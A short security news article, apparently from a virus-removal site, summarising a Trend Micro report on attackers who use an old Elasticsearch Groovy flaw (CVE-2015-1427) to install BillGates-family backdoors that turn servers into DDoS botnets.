News

Criminals turn Elasticsearch clusters into DDoS botnets

The hackers are attacking available on the Internet Elasticsearch clusters with the goal of turning them into DDoS botnets.

In multi-stage attacks, attackers used scripts to place a backdoor that could steal information and carry out DDoS attacks.

“The latest attack we spotted deviates from the usual profit-driven motive by delivering backdoors as its payload. These threats can turn affected targets into botnet zombies used in distributed-denial-of-service (DDoS) attacks”, — Trend Micro reports says.

Having found vulnerable servers, attackers downloaded a malicious script of the first stage, which disables the firewall and crypto miners detected on the target server. Next, on a second stage script with similar functionality was uploaded to the server. It could also disable the firewall and delete certain files, including various configuration files and competitor malware files, if they were present on the system.

Read also: Godlua became the first threat in history of information security that abuses the DoH protocol

Then it turned off crypto-mining processes and other unwanted processes on the system, and loaded the backdoor. Both scripts were downloaded from compromised websites in order to avoid detection.

“The samples bear the hallmarks of the BillGates malware, first encountered in 2014 and known for being used to compromise systems and initiate DDoS attacks. Of late, we’ve seen variants of the BillGates malware involved in botnet-related activities”, — Trend Micro specialists reported.

Previously, this malware appeared in attacks that exploit the remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638).

As part of the attacks, the hackers exploited the vulnerability (CVE-2015-1427) in the Groovy engine included in Elasticsearch (version 1.3.0 – 1.3.7 and 1.4.0 – 1.4.2).

According to the report, attacks on Elasticsearch servers are relatively simple and profit-oriented. The attackers are looking for unprotected and incorrectly configured servers or use old vulnerabilities to introduce malware, mainly crypto miners and ransomware programs.

William Reddy

I am from Ireland. My parents bought me a computer when I was 11, and several month after I have got a virus on this PC. I decided to enter the INSA Centre Val de Loire university after being graduated from the school. This French educational institution was offering a brand-new cybersecurity course. After getting the master degree in cybersecurity, I've started working in as virus analyst in a little anti-malware vendor. In 2018, I've decided to start Virus Removal project. The main target of this site is to help people to deal with PC viruses of any kind.

Leave a Reply

Your email address will not be published. Required fields are marked *

Sending

Back to top button